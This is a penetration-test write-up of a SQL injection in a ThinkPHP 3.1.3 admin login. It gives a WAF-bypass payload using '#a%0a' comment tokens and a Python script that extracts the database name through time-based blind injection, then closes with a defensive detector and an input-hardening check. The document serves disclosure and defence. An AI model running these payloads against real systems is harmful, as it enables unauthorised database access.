thinkphp3.1.3 SQL injection bypass

This is a vulnerability found during a crowdsourced test. I first noticed the site was built on the thinkphp3.1.3 framework, tried turning the parameter into array form, and got a SQL error back; after that I tried to bypass the WAF.

URL: http://**/console/ The login page has a SQL injection.
Vulnerable URL: http://**/console/Admin/Index/Login.shtml

1. The account parameter has a SQL injection, and the WAF can be bypassed with #a%0a. The following payload causes a 10 second delay, confirming the injection:

account[]=exp&account[1]=))#a%0aunion(#a%0aselect#a%0a(#a%0aselect#a%0asleep#a%0a(10))#a%0afrom#a%0a(select#a%0asleep#a%0a(10))a)#

2. Write a script to retrieve the database name:

```python
import requests
import time

u = "http://**/console/Admin/Index/Login.shtml"
# characters tried for each position of the database name
strs = "abcdefghijklmnopqrstuvwxyz0123456789_"
headers = {
    "Cookie": "PHPSESSID=xxx"
}
sess = requests.session()
sess.headers.update(headers)
xixi = ""  # database name recovered so far


def check(i, s, times=1):
    """Time-based test: is character i of database() equal to s?
    A hit (response slower than 4 s) is re-checked once to rule out network jitter."""
    t1 = time.time()
    data = {
        "account[]": "exp",
        "account[1]": "))union#a\n(select#a\n(1)from#a\n(select if#a\n(lower((mid((database())," + str(i) + ",1)))='" + s + "',sleep#a\n(4),0))a)#",
        "password[]": "6a",
        "verify": "6677",
    }
    print(s)
    sess.post(u, data=data, proxies={"http": "http://127.0.0.1:8080/"})
    t = time.time() - t1
    if t > 4:
        if times == 1:
            return check(i, s, times + 1)
        return True
    return False


for i in range(len(xixi) + 1, 50):
    for s in strs:
        if check(i, s):
            xixi = xixi + s
            print(xixi)
```
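For the defending side, the request shape above is easy to recognise: a PHP array parameter whose first element is the ThinkPHP `exp` operator, and `#...%0a` comment-newline tokens splitting SQL keywords. The following detector and hardening check are an added example, not code from the original post; the sample bodies are constructed to mirror the payload shape.

```python
import re
from urllib.parse import parse_qsl

# MySQL '#' comment ended by a newline: the WAF-bypass token used in the post
COMMENT_NEWLINE = re.compile(r"#[^\n]*\n")
SQL_KEYWORDS = re.compile(r"\b(union|select|sleep|from)\b", re.IGNORECASE)

# constructed sample bodies (same shape as the post's payload, not real traffic)
SAMPLE_BODY = "account[]=exp&account[1]=))#a\nunion#a\n(select#a\nsleep#a\n(4))#&password[]=6a&verify=6677"
BENIGN_BODY = "account=alice&password=hunter2&verify=6677"


def analyze_body(body):
    """Return {"suspicious": bool, "findings": [...]} for one form-encoded POST body."""
    findings = []
    pairs = parse_qsl(body, keep_blank_values=True)
    # group PHP array parameters: account[]=exp&account[1]=... -> {"account": ["exp", "..."]}
    arrays = {}
    for key, value in pairs:
        if "[" in key and key.endswith("]"):
            arrays.setdefault(key[:key.index("[")], []).append(value)
    for name, values in arrays.items():
        # ThinkPHP 3.x where() treats ["exp", "<sql>"] as a raw SQL expression
        if values and values[0].strip().lower() == "exp":
            findings.append(name + ": array parameter with 'exp' operator (raw SQL expression)")
    for key, value in pairs:
        # strip the comment-newline tokens, then look for the keywords they were hiding
        if COMMENT_NEWLINE.search(value) and SQL_KEYWORDS.search(COMMENT_NEWLINE.sub(" ", value)):
            findings.append(key + ": '#...\\n' comments splitting SQL keywords")
    return {"suspicious": bool(findings), "findings": findings}


def is_scalar_login_input(form):
    """Hardening check for the login handler: credentials must be plain strings,
    never PHP-style arrays, so the 'exp' expression operator cannot be reached."""
    return all(isinstance(form.get(k), str) for k in ("account", "password"))
```

The scalar check is the fix at the application layer; the body analyser is what a WAF rule or log review would apply, and it tolerates any comment text between `#` and the newline, not just the `a` used here.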